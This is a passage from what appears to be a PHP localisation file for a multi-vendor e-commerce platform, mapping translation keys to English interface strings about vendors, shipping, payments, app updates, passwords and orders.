'01xxxxxxxx' => '01xxxxxxxx', 'company@gmail.com' => 'Company@gmail.com', 'business_information' => 'Business information', 'website_header_logo' => 'Website header logo', 'website_footer_logo' => 'Website footer logo', 'loading_gif' => 'Loading gif', 'Environment_Settings' => 'Environment Settings', 'software_Update' => 'Software Update', 'site_Map' => 'Site Map', 'environment_information' => 'Environment information', 'EFood' => 'EFood', '00000000000000' => '00000000000000', 'OTP_&_Login_Attempts' => 'OTP & Login Attempts', 'login_Url' => 'Login Url', 'how_the_setting_works' => 'How the setting works', 'theme_Setup' => 'Theme Setup', 'minimum_customer_app_version' => 'Minimum customer app version', 'define_the_minimum_Android_app_version_for_best_user_experience' => 'Define the minimum Android app version for best user experience', 'if_a_user_still_don’t_have_it _they’ll_be_requested_a_force_app_update_when_they_opens_the_app' => 'If a user still don’t have it they’ll be requested a force app update when they opens the app', 'download_URL_for_customer_app' => 'Download URL for customer app', 'add_the_Android_app_download_URL_that_will_redirect_users_when_they_agree_to_update_the_app' => 'Add the Android app download URL that will redirect users when they agree to update the app', 'for_iOS' => 'For iOS', 'define_the_minimum_iOS_app_version_for_best_user_experience' => 'Define the minimum iOS app version for best user experience', 'if_a_user_still_don’t _have_it _they’ll_be_requested_a_force_app_update_when_they_opens_the_app' => 'If a user still don’t have it they’ll be requested a force app update when they opens the app', 'add_the_iOS_app_download_URL_that_will_redirect_users_when_they_agree_to_update_the_app' => 'Add the iOS app download URL that will redirect users when they agree to update the app', 'vendor_app_version_control' => 'Vendor app version control', 'minimum_Vendor_app_version' => 'Minimum Vendor app version', 'download_URL_For_Vendor_App' => 'Download URL For Vendor App', 'minimum_deliveryman_app_version' => 'Minimum deliveryman app version', 'what_is_app_version' => 'What is app version', 'this_app_version_means_the_minimum_version_of_Vendor_Deliveryman_and_Customer_apps_that_are_required_for_the_update' => 'This app version means the minimum version of Vendor Deliveryman and Customer apps that are required for the update', 'app_download_link' => 'App download link', 'search_for_items' => 'Search for items', 'all_vendors' => 'All vendors', 'vendor_zone' => 'Vendor zone', 'become_a_vendor' => 'Become a vendor', 'vendor_login' => 'Vendor login', 'please_check_the_recaptcha.' => 'Please check the recaptcha.', 'password_do_not_match' => 'Password do not match', 'password_match' => 'Password match', 'all_input_field_required' => 'All input field required', 'sorry_stock_limit_exceeded' => 'Sorry stock limit exceeded', 'Please_Sign_in' => 'Please Sign in', 'You_need_to_Sign_in_to_view_this_feature' => 'You need to Sign in to view this feature', 'vendor_Apply' => 'Vendor Apply', 'shop_application' => 'Shop application', 'already_have_an_account' => 'Already have an account', 'congratulations' => 'Congratulations', 'your_registration_is_successful' => 'Your registration is successful', 'please-wait_for_admin_approval' => 'Please-wait for admin approval', ' you’ll_get_a_mail_soon' => ' you’ll get a mail soon', 'want_to_apply_as_a_vendor' => 'Want to apply as a vendor', 'Download_PDF' => 'Download PDF', 'vendor_Earning_Report' => 'Vendor Earning Report', 'deliveryman_Incentive' => 'Deliveryman Incentive', 'vendor_product_sale_Report' => 'Vendor product sale Report', 'vendor_Reports' => 'Vendor Reports', 'vendor-Info' => 'Vendor-Info', 'vendor_Report' => 'Vendor Report', 'website_shop_view' => 'Website shop view', 'approved_product_list' => 'Approved product list', 'new_product_request' => 'New product request', 'denied_product_request' => 'Denied product request', 'reports_&_analytics' => 'Reports & analytics', 'transactions_Report' => 'Transactions Report', 'order_report' => 'Order report', 'shop_Settings' => 'Shop Settings', 'upload_Image' => 'Upload Image', 'the_discount_price_will_not_larger_then_Variant_Price' => 'The discount price will not larger then Variant Price', 'contact_information_table' => 'Contact information table', 'want_to_Turn_ON_the_this_status' => 'Want to Turn ON the this status', 'want_to_Turn_OFF_the_this_status' => 'Want to Turn OFF the this status', 'copied_successfully' => 'Copied successfully', 'monitor_your_business_analytics_and_statistics' => 'Monitor your business analytics and statistics', 'order_statistics' => 'Order statistics', 'vendor' => 'Vendor', 'user_overview' => 'User overview', 'most_Popular_Products' => 'Most Popular Products', 'update_emergency_contact' => 'Update emergency contact', 'search_by_category_name' => 'Search by category name', 'there_were_' => 'There were ', '_products_under_this_category' => ' products under this category', 'please_update_their_category_from_the_below_list_before_deleting_this_one' => 'Please update their category from the below list before deleting this one', 'select_Category' => 'Select Category', 'name_is_required' => 'Name is required', 'country_code_is_required' => 'Country code is required', 'phone_is_required' => 'Phone is required', 'emergency_contact_added_successfully' => 'Emergency contact added successfully', 'emergency_contact_update_successfully' => 'Emergency contact update successfully', 'vendor_Login' => 'Vendor Login', 'welcome_back_to_vendor_login' => 'Welcome back to vendor login', 'your_account_has_been_suspended' => 'Your account has been suspended', 'please_contact_with' => 'Please contact with', 'help_and_support' => 'Help and support', 'your_account_is_not_approved_yet' => 'Your account is not approved yet', 'please_wait_or_contact_with' => 'Please wait or contact with', 'The_first_name_field_is_required' => 'The first name field is required', 'The_last_name_field_is_required' => 'The last name field is required', 'The_password_must_be_at_least :min_characters' => 'The password must be at least :min characters', 'captcha_failed' => 'Captcha failed', 'order_analytics' => 'Order analytics', 'vendor_Wallet' => 'Vendor Wallet', 'income' => 'Income', 'want_to_change_the_shipping_responsibility_to_Vendor_Wise' => 'Want to change the shipping responsibility to Vendor Wise', 'vendors_will_handle_the_shipping_responsibilities_when_you_choose_vendor_wise_shipping_method' => 'Vendors will handle the shipping responsibilities when you choose vendor wise shipping method', 'vendor_wise_shipping' => 'Vendor wise shipping', 'when_adding_a_product_a_product_specific_shipping_charge_is_added_Verify_that_all_of_the_products_delivery_costs_are_up_to_date' => 'When adding a product a product specific shipping charge is added Verify that all of the products delivery costs are up to date', 'shipping_methods' => 'Shipping methods', 'update_deliveryman' => 'Update deliveryman', 'delivery_man_image' => 'Delivery man image', 'The_password_must_be_at_least_8_characters_long_and_contain_at_least_one_uppercase_letter' => 'The password must be at least 8 characters long and contain at least one uppercase letter', '_one_lowercase_letter' => ' one lowercase letter', '_one_digit_' => ' one digit ', '_one_special_character' => ' one special character', '_and_no_spaces' => ' and no spaces', 'want_to_update_this_delivery_man' => 'Want to update this delivery man', 'search_by_shop_name_or_vendor_name_or_phone_or_email' => 'Search by shop name or vendor name or phone or email', 'vendor_name' => 'Vendor name', 'approved_refund_Requests' => 'Approved refund Requests', 'vendor_Requests' => 'Vendor Requests', 'refund_ID' => 'Refund ID', 'vendor_details' => 'Vendor details', 'want_to_active_this_vendor' => 'Want to active this vendor', 'vendor_information' => 'Vendor information', 'withdraw_request' => 'Withdraw request', 'withdraw_request_table' => 'Withdraw request table', 'add_new_Vendor' => 'Add new Vendor', 'vendor_Image' => 'Vendor Image', 'Jhon' => 'Jhon', 'doe' => 'Doe', 'want_to_add_this_vendor' => 'Want to add this vendor', 'vendor_Orders' => 'Vendor Orders', 'vendor_discount' => 'Vendor discount', 'vendor_net_income' => 'Vendor net income', 'vendor_Information' => 'Vendor Information', 'vendor_setup' => 'Vendor setup', 'set_the_default_commission_amount_that_will_be_received_from_vendors_on_each_order' => 'Set the default commission amount that will be received from vendors on each order', 'enable_POS_in_Vendor_Panel' => 'Enable POS in Vendor Panel', 'if_enabled_POS_will_be_available_on_the_Vendor_Panel' => 'If enabled POS will be available on the Vendor Panel', 'want_to_Turn_ON_POS_for_Vendor' => 'Want to Turn ON POS for Vendor', 'want_to_Turn_OFF_POS_for_Vendor' => 'Want to Turn OFF POS for Vendor', 'if_enabled_POS_option_will_be_available_in_the_Vendor_Panel' => 'If enabled POS option will be available in the Vendor Panel', 'if_disabled_POS_option_will_be_hidden_from_the_Vendor_Panel' => 'If disabled POS option will be hidden from the Vendor Panel', 'vendor_registration' => 'Vendor registration', 'if_enabled_vendors_can_send_registration_requests_to_admin' => 'If enabled vendors can send registration requests to admin', 'if_enabled_Vendors_can_register_by_themselves_from_website_or_app' => 'If enabled Vendors can register by themselves from website or app', 'if_disabled_Vendors_can_not_register_themselves_from_website_or_App' => 'If disabled Vendors can not register themselves from website or App', 'only_Admin_can_create_an_account_for_any_Vendor' => 'Only Admin can create an account for any Vendor', 'if_enabled_Vendors_can_set_minimum_order_amount_for_their_stores_by_themselves' => 'If enabled Vendors can set minimum order amount for their stores by themselves', 'if_disabled_Vendors_cannot_set_the_minimum_order_amount_for_their_store_and_the_admin_will_set_it' => 'If disabled Vendors cannot set the minimum order amount for their store and the admin will set it', 'set_whether_Vendors_need_admin_approval_before_adding_new_products_to_their_shops' => 'Set whether Vendors need admin approval before adding new products to their shops', 'this_feature_will_activate_whenever_a_Vendor_add_a_product_or_modifies_the_shipping_cost_of_any_product' => 'This feature will activate whenever a Vendor add a product or modifies the shipping cost of any product', 'vendor_Product_List' => 'Vendor Product List', 'select_vendor' => 'Select vendor', 'if_you_enable_this_Withdraw_method_will_be_shown_in_the_vendor_app_and_vendor_panel' => 'If you enable this Withdraw method will be shown in the vendor app and vendor panel', 'if_you_disable_this_Withdraw_method_will_not_be_shown_in_the_vendor_app_and_vendor_panel' => 'If you disable this Withdraw method will not be shown in the vendor app and vendor panel', 'if_you_enable_this_Withdraw_method_will_be_set_as_Default_Withdraw_Method_in_the_vendor_app_and_vendor_panel' => 'If you enable this Withdraw method will be set as Default Withdraw Method in the vendor app and vendor panel', 'if_you_disable_this_Withdraw_method_will_be_remove_as_Default_Withdraw_Method_in_the_vendor_app_and_vendor_panel' => 'If you disable this Withdraw method will be remove as Default Withdraw Method in the vendor app and vendor panel', 'default_method_updated_successfully' => 'Default method updated successfully', 'withdrawal_methods' => 'Withdrawal methods', 'add_fields' => 'Add fields', 'select_method_name' => 'Select method name', 'select_field_name' => 'Select field name', 'select_placeholder_text' => 'Select placeholder text', 'vendor_withdraw_information' => 'Vendor withdraw information', 'vendor_info' => 'Vendor info', 'want_to_suspend_this_vendor' => 'Want to suspend this vendor', 'suspend_this_vendor' => 'Suspend this vendor', 'vendor_Details' => 'Vendor Details', 'sales_commission' => 'Sales commission', 'want_to_Turn_ON_Sales_Commission_For_This_Vendor' => 'Want to Turn ON Sales Commission For This Vendor', 'want_to_Turn_OFF_Sales_Commission_For_This_Vendor' => 'Want to Turn OFF Sales Commission For This Vendor', 'want_to_Turn_ON_GST_Number_For_This_Vendor' => 'Want to Turn ON GST Number For This Vendor', 'want_to_Turn_OFF_GST_Number_For_This_Vendor' => 'Want to Turn OFF GST Number For This Vendor', 'vendor_POS' => 'Vendor POS', 'vendor_POS_permission' => 'Vendor POS permission', 'if_enabled_this_vendor_can_access_POS_from_the_website_and_vendor_app' => 'If enabled this vendor can access POS from the website and vendor app', 'want_to_Turn_ON_POS_For_This_Vendor' => 'Want to Turn ON POS For This Vendor', 'want_to_Turn_OFF_POS_For_This_Vendor' => 'Want to Turn OFF POS For This Vendor', 'if_disabled_this_vendor_cannot_access_POS_from_the_website_and_vendor_app' => 'If disabled this vendor cannot access POS from the website and vendor app', 'order_&_shipping_info' => 'Order & shipping info', 'vendor_amount' => 'Vendor amount', 'Vendor_has_been_suspended_successfully' => 'Vendor has been suspended successfully', 'Account_Suspended' => 'Account Suspended', 'Your_Account_Has_Been_Suspended' => 'Your Account Has Been Suspended', 'your_account_access_has_been_suspended_by_admin' => 'Your account access has been suspended by admin', 'from_now_you_can_access_your_app_and_panel_again' => 'From now you can access your app and panel again', 'please_contact_us_for_any_queries _we’re_always_happy_to_help' => 'Please contact us for any queries we’re always happy to help', 'Vendor_Registration' => 'Vendor Registration', 'Hi' => 'Hi', 'please_contact_us_for_any_queries' => 'Please contact us for any queries', '_we’re_always_happy_to_help' => ' we’re always happy to help', 'Thanks_&_Regards' => 'Thanks & Regards', 'Contact_Us' => 'Contact Us', 'All_copy_right_reserved' => 'All copy right reserved', 'want_to_approve_this_update_request' => 'Want to approve this update request', 'want_to_deny_this_update_request' => 'Want to deny this update request', 'product_unit' => 'Product unit', 'variation_wise_price' => 'Variation wise price', 'product_SEO_&_meta_data' => 'Product SEO & meta data', 'video_link' => 'Video link', 'reject_reason' => 'Reject reason', 'want_to_approve_this_product_request_request' => 'Want to approve this product request request', 'brand_not_found' => 'Brand not found', 'review_image' => 'Review image', 'meta_title_not_found' => 'Meta title not found', 'meta_description_not_found' => 'Meta description not found', 'want_to_unblock' => 'Want to unblock', 'want_to_block' => 'Want to block', 'click_for_details' => 'Click for details', 'please_resume_the_order_from_here' => 'Please resume the order from here', 'search_by_customer_name' => 'Search by customer name', 'cart_is_empty' => 'Cart is empty', 'sorry_product_is_out_of_stock' => 'Sorry product is out of stock', 'sorry_the_minimum_value_was_reached' => 'Sorry the minimum value was reached', 'vendor_Order' => 'Vendor Order', 'pending_refund_Requests' => 'Pending refund Requests', 'withdraw_request_denied' => 'Withdraw request denied', 'Vendor_Payment_request_has_been_Denied_successfully' => 'Vendor Payment request has been Denied successfully', 'All_vendor_Page' => 'All vendor Page', 'all_Stores' => 'All Stores', 'Find_your_desired_stores_and_shop_your_favourite_products' => 'Find your desired stores and shop your favourite products', 'Send_Message_to_vendor' => 'Send Message to vendor', 'password_must_be_7+_Character' => 'Password must be 7+ Character', 'my_Address' => 'My Address', 'chat_with_vendor' => 'Chat with vendor', 'you_haven’t_any_conversation_yet' => 'You haven’t any conversation yet', 'great' => 'Great', 'best_delivery_service_highly_recommended' => 'Best delivery service highly recommended', 'send_message_to' => 'Send message to', 'search_delivery_men' => 'Search delivery men', 'want_to_enable_the_Temporary_Close' => 'Want to enable the Temporary Close', 'want_to_disable_the_Temporary_Close' => 'Want to disable the Temporary Close', 'vacation_mode' => 'Vacation mode', 'vacation_start' => 'Vacation start', 'vacation_end' => 'Vacation end', 'vacation_note' => 'Vacation note', 'insufficient_loyalty_point' => 'Insufficient loyalty point', 'my_Inbox' => 'My Inbox', 'delete_my_account' => 'Delete my account', 'Eng' => 'Eng', 'Logo' => 'Logo', 'morning_mart' => 'Morning mart', 'bata' => 'Bata', 'first_shipping' => 'First shipping', 'first_shipping_all_across_the_country' => 'First shipping all across the country', 'authentic_products' => 'Authentic products', 'secure_payment' => 'Secure payment', 'we_ensure_secure_transactions' => 'We ensure secure transactions', 'support_center' => 'Support center', 'we_ensure_quality_support' => 'We ensure quality support', 'open_your_store' => 'Open your store', 'top_stores' => 'Top stores', 'Customer_Added_Successfully' => 'Customer Added Successfully', 'don’t_have_account' => 'Don’t have account', 'character' => 'Character', 'copied-failed' => 'Copied-failed', 'order_can_be_canceled_only_when_pending' => 'Order can be canceled only when pending', 'please_select_a_payment_methods' => 'Please select a payment methods', 'please_retype_password' => 'Please retype password', 'password_must_be_8_Character' => 'Password must be 8 Character', 'hurry_up' => 'Hurry up', 'View_all' => 'View all', 'want_to_order_your_usuals' => 'Want to order your usuals', 'just_reorder_from_your_previous_orders' => 'Just reorder from your previous orders', 'final_total' => 'Final total', 'find' => 'Find', 'happy_club' => 'Happy club', 'featured_deals' => 'Featured deals', 'top_rated_products' => 'Top rated products', 'don’t_miss_the_chance' => 'Don’t miss the chance', 'today’s_best_deal' => 'Today’s best deal', 'reply_sent' => 'Reply sent', 'reply_not_sent' => 'Reply not sent', 'reply_status' => 'Reply status', 'not_sent' => 'Not sent', 'image_type_jpg _jpeg _webp_or_png' => 'Image type jpg jpeg webp or png', 'image_maximum_size_' => 'Image maximum size ', 'more_categories' => 'More categories', 'more_brands' => 'More brands', 'grid_view' => 'Grid view', 'list_view' => 'List view', 'contact_with' => 'Contact with', 'search_product' => 'Search product', 'show_product' => 'Show product', 'details_description' => 'Details description', 'visit_store' => 'Visit store', 'similar_products_from_other_stores' => 'Similar products from other stores', 'my_order_list' => 'My order list', 'show_order' => 'Show order', 'Chat_with_vendor' => 'Chat with vendor', 'my_addresses' => 'My addresses', 'want_to_delete_this_address' => 'Want to delete this address', 'create_your_own_store' => 'Create your own store', 'already_have_store' => 'Already have store', 'open_your_and_start_selling' => 'Open your and start selling', 'jhon' => 'Jhon', 'vendor_image' => 'Vendor image', 'store_secondary_banner' => 'Store secondary banner', 'sorry_out_of_stock' => 'Sorry out of stock', 'product_removed_from_the_wishlist' => 'Product removed from the wishlist', 'do_not_miss_todays_deal' => 'Do not miss todays deal', '0.00' => '0.00', '10 00000' => '10 00000', 'top_rated_vendor' => 'Top rated vendor', 'new_vendor' => 'New vendor', 'loader' => 'Loader', 'dark_Mode' => 'Dark Mode', 'light_Mode' => 'Light Mode', 'vendor_reg' => 'Vendor reg', 'promo' => 'Promo', 'trash' => 'Trash', 'my_inbox' => 'My inbox', 'Click_here_to_see_instructions' => 'Click here to see instructions', 'no_Order_Found' => 'No Order Found', 'you_have_not_placed_any__order_yet' => 'You have not placed any order yet', 'my_order_details_vendor_info' => 'My order details vendor info', 'products_Not_Found' => 'Products Not Found', 'for_“Ready_Product”_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_“Ready_After_Sale”_deliveries _customers_pay_first_then_vendor_uploads_the_digital_products_that_become_available_to_customers_for_download' => 'For “Ready Product” deliveries customers can pay & instantly download pre-uploaded digital products. For “Ready After Sale” deliveries customers pay first then vendor uploads the digital products that become available to customers for download', 123412 => '123412', 'add_color_wise_product_images_here' => 'Add color wise product images here', 'must_upload_colour_wise_images_first' => 'Must upload colour wise images first', 'colour_is_shown_in_the_image_section_top_right.' => 'Colour is shown in the image section top right.', 'want_to_update_this_product' => 'Want to update this product', 'want_to_update_admin_password' => 'Want to update admin password', 'product_gallery' => 'Product gallery', 'if_enabled WhatsApp_chatting_option_will_be_hidden_from_the_system' => 'If enabled WhatsApp chatting option will be hidden from the system', 'map_api_key(Client)' => 'Map api key(Client)', 'if_enabled WhatsApp_chatting_option_will_be_available_in_the_system' => 'If enabled WhatsApp chatting option will be available in the system', 'client_key_should_have_enable_map_javascript_api_and_you_can_restrict_it_with_http_refer' => 'Client key should have enable map javascript api and you can restrict it with http refer', 'proceed_to_Checkout' => 'Proceed to Checkout', 'No_review_given_yet' => 'No review given yet', 'you_need_to_select_address_from_your_selected_country' => 'You need to select address from your selected country', 'faster_&_secure_way_to_pay' => 'Faster & secure way to pay', 'has_been_placed.' => 'Has been placed.', 'when_payment_method_cash_on_delivery_and_order_status_not_delivered_then_you_can`t_change_payment_status_unpaid_to_paid' => 'When payment method cash on delivery and order status not delivered then you can`t change payment status unpaid to paid', 'when_payment_status_paid_then_you_can`t_change_payment_status_paid_to_unpaid' => 'When payment status paid then you can`t change payment status paid to unpaid', 'when_order_status_delivered_you_can`t_update_the_delivery_man_incentive' => 'When order status delivered you can`t update the delivery man incentive', 'add_info_from_gallery' => 'Add info from gallery', 'want_to_turn_OFF_WhatsApp_as_social_media_chat_option' => 'Want to turn OFF WhatsApp as social media chat option', 'Analytic_Scripts' => 'Analytic Scripts', 'google_map_APIs' => 'Google map APIs', 'SMS_config' => 'SMS config', 'social_media_login' => 'Social media login', 'social_media_chat' => 'Social media chat', 'if_enabled map_will_be_hidden_from_the_system' => 'If enabled map will be hidden from the system', 'all_shops' => 'All shops', 'if_enabled map_will_be_available_in_the_system' => 'If enabled map will be available in the system', 'want_to_turn_OFF_map' => 'Want to turn OFF map', 'choose_address_type' => 'Choose address type', 'add_informations' => 'Add informations', 'Update_Addresses' => 'Update Addresses', 'update_Address' => 'Update Address', '_you_cannot_change_the_status_again' => ' you cannot change the status again', 'image_Description' => 'Image Description', 'expense_bearer_' => 'Expense bearer ', 'confirm_payments_before_change_the_status' => 'Confirm payments before change the status', 'change_the_status_paid_only_when_you_received_the_payment_from_customer' => 'Change the status paid only when you received the payment from customer', '_once_you_change_the_status_to_paid' => ' once you change the status to paid', 'digital_payment_methods' => 'Digital payment methods', 'offline_payment_methods' => 'Offline payment methods', 'choose_logo' => 'Choose logo', 'want_to_turn_ON_WhatsApp_as_social_media_chat_option' => 'Want to turn ON WhatsApp as social media chat option', 'want_to_turn_ON_map' => 'Want to turn ON map', 'my_order_details_track_order' => 'My order details track order', 'delivery_complete' => 'Delivery complete', 'order_confirmed' => 'Order confirmed', 'preparing_shipment' => 'Preparing shipment', '0/100' => '0/100', 'want_to_add_this_delivery_man' => 'Want to add this delivery man', 'add_product' => 'Add product', 'search_ticket_by_subject_or_status' => 'Search ticket by subject or status', 'when_the_status_is_enabled_employees_can_access_the_system_to_perform_their_responsibilities' => 'When the status is enabled employees can access the system to perform their responsibilities', 'want_to_Turn_OFF_Employee_Status' => 'Want to Turn OFF Employee Status', 'location_on_Map' => 'Location on Map', 'this_amount_will_be_count_as_admin_expense' => 'This amount will be count as admin expense', 'encourage_your_deliveryman_by_giving_him_incentive' => 'Encourage your deliveryman by giving him incentive', 'this_amount_will_be_count_as_vendor_expense' => 'This amount will be count as vendor expense', 'delivery_man_incentive' => 'Delivery man incentive', 'deliveryman_charge_added_successfully' => 'Deliveryman charge added successfully', 'expected_delivery_date_added_successfully' => 'Expected delivery date added successfully', 'all_Brands_Page' => 'All Brands Page', 'Find_your_favourite_brands_and_products' => 'Find your favourite brands and products', 'edit_personal_details' => 'Edit personal details', 'update_profile' => 'Update profile', 'edit_my_profile' => 'Edit my profile', 'Doe' => 'Doe', 'enter_email_number' => 'Enter email number', 'ex:_7+_characters' => 'Ex: 7+ characters', 'image_size_must_be_within_2MB' => 'Image size must be within 2MB', 'image_format_jpg_jpeg_png' => 'Image format jpg jpeg png', 'password_must_be_8_character' => 'Password must be 8 character', 'select_shipping_method' => 'Select shipping method', 'before_the_vendor_confirms_the_order' => 'Before the vendor confirms the order', 'edit_Address' => 'Edit Address', 'choose_label' => 'Choose label', 'contact_person' => 'Contact person', 'update_address' => 'Update address', '01XXXXXX' => '01XXXXXX', 'ex_:_1216_dhaka' => 'Ex : 1216 dhaka', 'enter_your_city' => 'Enter your city', 'enter_your_zip_code' => 'Enter your zip code', 'ex_:_1216_Dhaka' => 'Ex : 1216 Dhaka', 'language_change_successfully' => 'Language change successfully', 'phone_number_is_required' => 'Phone number is required', 'The_phone_number_must_be_at_least_4_characters' => 'The phone number must be at least 4 characters', 'The_phone_number_may_not_be_greater_than_20_characters' => 'The phone number may not be greater than 20 characters', 'Subject_is_Empty' => 'Subject is Empty', 'Message_is_Empty' => 'Message is Empty', 'Your_Message_Send_Successfully' => 'Your Message Send Successfully', 'No_shipping_options_available_at_this_shop' => 'No shipping options available at this shop', 'please_remove_all_items_from_this_shop' => 'Please remove all items from this shop', 'shipping_Not_Available' => 'Shipping Not Available', 'social' => 'Social', 'the_pagination_limit_must_be_numeric' => 'The pagination limit must be numeric', 'United_States_Dollar' => 'United States Dollar', 'ex:United States Dollar' => 'Ex:United States Dollar', 'default_currency_can_not_be_deleted' => 'Default currency can not be deleted', 'to_delete_change_the_default_currency_first' => 'To delete change the default currency first', 'thank_you_for_your_order!' => 'Thank you for your order!', 'your_order_is_being_processed_and_will_be_completed_within_3_to_6 hours' => 'Your order is being processed and will be completed within 3 to 6 hours', 'basic_information' => 'Basic information', 'full_Name' => 'Full Name', 'want_to_update_vendor_info' => 'Want to update vendor info', 'new_Password' => 'New Password', 'confirm_Password' => 'Confirm Password', 'want_to_update_vendor_password' => 'Want to update vendor password', 'shop_Edit' => 'Shop Edit', 'edit_shop_info' => 'Edit shop info', 'upload_banner' => 'Upload banner', 'banner_image_type_jpg _jpeg _webp_or_png' => 'Banner image type jpg jpeg webp or png', 'banner_maximum_size_' => 'Banner maximum size ', 'bottom_banner_type_jpg _jpeg _webp_or_png' => 'Bottom banner type jpg jpeg webp or png', 'bottom_banner_maximum_size_' => 'Bottom banner maximum size ', 'offer_banner_type_jpg _jpeg _webp_or_png' => 'Offer banner type jpg jpeg webp or png', 'offer_banner_maximum_size_' => 'Offer banner maximum size ', 'Shop_updated_successfully' => 'Shop updated successfully', 'select_Vendor' => 'Select Vendor', 'all_Vendor' => 'All Vendor', 'ex:10' => 'Ex:10', 'coupon_status_updated' => 'Coupon status updated', 'if_you_fill_up_this_section_this_address_will_use_in_future._if_need_to_send_to_you' => 'If you fill up this section this address will use in future. if need to send to you', 'shopping_Details' => 'Shopping Details', 'set_form_map' => 'Set form map', '-94.22213' => '-94.22213', '103.344322' => '103.344322', 'Jhon_Doe' => 'Jhon Doe', '+8801000000000' => '+8801000000000', 1216 => '1216', '+88 01000000000' => '+88 01000000000', 'Dhaka' => 'Dhaka', 'sent_attachments' => 'Sent attachments', 'chatting' => 'Chatting', 'currently_we_are_not_available.' => 'Currently we are not available.', 'but_you_can_ask_or_still_message_us.' => 'But you can ask or still message us.', 'We_will_get_back_to_you_soon.' => 'We will get back to you soon.', 'Thank_you_for_your_patience.' => 'Thank you for your patience.', 'reCAPTCHA_is_now_enabled_for_added_security' => 'ReCAPTCHA is now enabled for added security', 'users_may_be_prompted_to_complete_a_reCAPTCHA_challenge_to_verify_their_human_identity_and protect_against_spam_and_malicious_activity' => 'Users may be prompted to complete a reCAPTCHA challenge to verify their human identity and protect against spam and malicious activity', 'check_in_Accept_the_reCAPTCHA_Terms_of_Service' => 'Check in Accept the reCAPTCHA Terms of Service', 'copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save' => 'Copy Site Key and Secret Key Paste in the input filed below and Save', 'your_payment_has_been_successfully_processed_and_your_order' => 'Your payment has been successfully processed and your order', 'payment_none' => 'Payment none', 'invoice_Date' => 'Invoice Date', 'invoice_of' => 'Invoice of', 'billed_To' => 'Billed To', 'shipping_To' => 'Shipping To', 'item_Description' => 'Item Description', 'unit_Price' => 'Unit Price', 'total_Item_Price' => 'Total Item Price', 'sub_Total' => 'Sub Total', 'thanks_for_the_purchase' => 'Thanks for the purchase', 'change_of_mind_is_not_applicable_as_a_reason_for_refund_or_exchange' => 'Change of mind is not applicable as a reason for refund or exchange', 'after_adding_a_new_language _you_need_to_translate_the_key_contents_for_users_to_experience_this_feature' => 'After adding a new language you need to translate the key contents for users to experience this feature', 'to_translate_a_language_click_the_action_button_from_the_language_table_&_click_translate' => 'To translate a language click the action button from the language table & click translate', 'then_change_the_key_language_value_manually_or_click_the_‘Auto_Translate’_button' => 'Then change the key language value manually or click the ‘Auto Translate’ button', 'Finally _click_‘Update’_to_save_the_changes' => 'Finally click ‘Update’ to save the changes', 'want_to_Turn_ON_Language_Status' => 'Want to Turn ON Language Status', 'want_to_Turn_OFF_Language_Status' => 'Want to Turn OFF Language Status', 'want_to_Change_Default_Language_Status' => 'Want to Change Default Language Status', 'about_our_company' => 'About our company', 'walking_Customer' => 'Walking Customer', 'delivery_Info' => 'Delivery Info', 'self_Delivery' => 'Self Delivery', 'deliveryman_Name' => 'Deliveryman Name', 'deliveryman_Phone' => 'Deliveryman Phone', 'invoice_date' => 'Invoice date', 'want_to_cancel_this_order' => 'Want to cancel this order', 'product_image' => 'Product image', 'not_rated_yet' => 'Not rated yet', 'customer_review' => 'Customer review', 'all_copy_right_reserved_©_2024_' => 'All copy right reserved © 2024 ', 'vendor_Discount' => 'Vendor Discount', 'vendor_Net_Income' => 'Vendor Net Income', 'Profile_Information' => 'Profile Information', 'this_will_be_displayed_as_your_profile_name' => 'This will be displayed as your profile name', 'ABC' => 'ABC', 'phone_Number' => 'Phone Number', 123456789 => '123456789', 'you_can_login_to_your_panel_by_using_this_email' => 'You can login to your panel by using this email', 'enter_confirm_password' => 'Enter confirm password', 'change_Password' => 'Change Password', 'The_password_field_is_required' => 'The password field is required', 'The_confirm_password_field_is_required' => 'The confirm password field is required', 'The_password_and_confirm_password_must_be_match' => 'The password and confirm password must be match', 'The password must be at least 8 characters long and contain at least one uppercase letter one lowercase letter one digit one special character and no spaces.' => 'The password must be at least 8 characters long and contain at least one uppercase letter one lowercase letter one digit one special character and no spaces.', 'last_name_is_required' => 'Last name is required', 'The_image_type_must_be' => 'The image type must be', 'profile_updated_successfully' => 'Profile updated successfully', 'want_to_update_admin_info' => 'Want to update admin info', 'free_shipping' => 'Free shipping', 'Payment_using_your_wallet_balance' => 'Payment using your wallet balance', 'you_get_free_delivery_bonus' => 'You get free delivery bonus', 'N/A' => 'N/A', 'product_not_available_right_now' => 'Product not available right now', 'please_remove_all_products_from_unavailable_vendors' => 'Please remove all products from unavailable vendors', 'Please_remove_this_unavailable_product_for_continue' => 'Please remove this unavailable product for continue', 'Your_order_has_been_successfully_placed' => 'Your order has been successfully placed', 'Thank_you_for_your_purchase!' => 'Thank you for your purchase!', 'details_will_be_sent_to_your_email_shortly.' => 'Details will be sent to your email shortly.', 'Some_items_were_not_added_to_your_cart_because_they_are_currently_unavailable_for_purchase!' => 'Some items were not added to your cart because they are currently unavailable for purchase!', 'Some_items_were_not_added_to_your_cart_because_they_are_currently_unavailable_for_purchase.!' => 'Some items were not added to your cart because they are currently unavailable for purchase.!', 'logged out successfully' => 'Logged out successfully', 'image_ratio_3:1' => 'Image ratio 3:1', 'no_contact_found' => 'No contact found', 'emergency_contact_deleted_successfully' => 'Emergency contact deleted successfully', 'emergency_contact_deleted_successfully!' => 'Emergency contact deleted successfully!', 'logged_out_successfully' => 'Logged out successfully', 'image_ratio_1:1' => 'Image ratio 1:1', 'The_bottom_banner_type_must_be' => 'The bottom banner type must be', '_website' => ' website', 'your_account_is_in_review_process' => 'Your account is in review process', 'please_wait_for_admin_approval' => 'Please wait for admin approval', 'ppppppp' => 'Ppppppp', 'invalid_credential' => 'Invalid credential', 'Shopping Cart' => 'Shopping Cart', 'New_Message' => 'New Message', 'please_check_your_inventory_and_update' => 'Please check your inventory and update', 'There_isn’t_enough_quantity_on_stock' => 'There isn’t enough quantity on stock', 'please_check_your_inventory' => 'Please check your inventory', 'Website View' => 'Website View', 'Notifications' => 'Notifications', 'Can not change payment status before order delivered!' => 'Can not change payment status before order delivered!', 'currently_you_are_managing_banners_for' => 'Currently you are managing banners for', 'no_banner_found' => 'No banner found', 'email@domain.com' => 'Email@domain.com', 'the_url_field_is_required' => 'The url field is required', 'the_image_is_required' => 'The image is required', 'enter_your_order_ID_&_phone_number_to_get_delivery_updates' => 'Enter your order ID & phone number to get delivery updates', 'your_order' => 'Your order', 